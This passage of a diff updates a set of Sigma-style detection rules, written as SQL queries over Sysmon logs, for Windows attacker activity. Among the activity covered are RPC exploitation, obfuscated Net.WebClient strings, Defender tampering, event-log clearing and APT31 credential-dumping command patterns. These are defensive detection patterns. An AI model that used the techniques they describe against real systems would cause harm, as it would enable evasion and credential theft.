"proc_creation_win_regedit_import_keys.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "status": "experimental", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1059.001" + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", - "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", - "author": "frack113", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE 
'%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE 
'%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Sysinternals PsService Execution", - "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "status": "experimental", - "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.t1543.003" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Legitimate use of PsService by an administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
(OriginalFileName = 'psservice.exe' OR (Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psservice.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Defrag Deactivation", - "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005", - "attack.s0111" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_slingshot.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", + 
"title": "Potential Windows Defender Tampering Via Wmic.EXE", + "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "title": "Suspicious Execution of Hostname", + "id": "7be5fb68-f9ef-476d-8b51-0256ebece19e", "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "description": "Use of hostname to get information", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", 
- "attack.t1003.001", - "attack.t1560.001" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\HOSTNAME.EXE' ESCAPE '\\')" + ], + "filename": "proc_creation_win_hostname_execution.yml" + }, + { + "title": "Recon Information for Export with Command Prompt", + "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "status": "experimental", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", + "tags": [ + "attack.collection", + "attack.t1119" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tree.com' ESCAPE '\\' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\doskey.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_susp_recon.yml" }, { - "title": "CMSTP 
Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 
'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Potential Defense Evasion Via Binary Rename", - "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", - "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", + "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "status": "experimental", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.persistence", + "attack.defense_evasion" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist" + "Installation of unsigned packages for testing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary.yml" + "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "title": "Exploit for CVE-2017-0261", + "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - 
"Unknown" + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_cve_2017_0261.yml" }, { - "title": "Windows Share Mount Via Net.EXE", - "id": "f117933c-980c-4f78-b384-e3d838111165", + "title": "Suspicious SysAidServer Child", + "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "status": "experimental", - "description": "Detects when a share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate activity by administrators and scripts" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 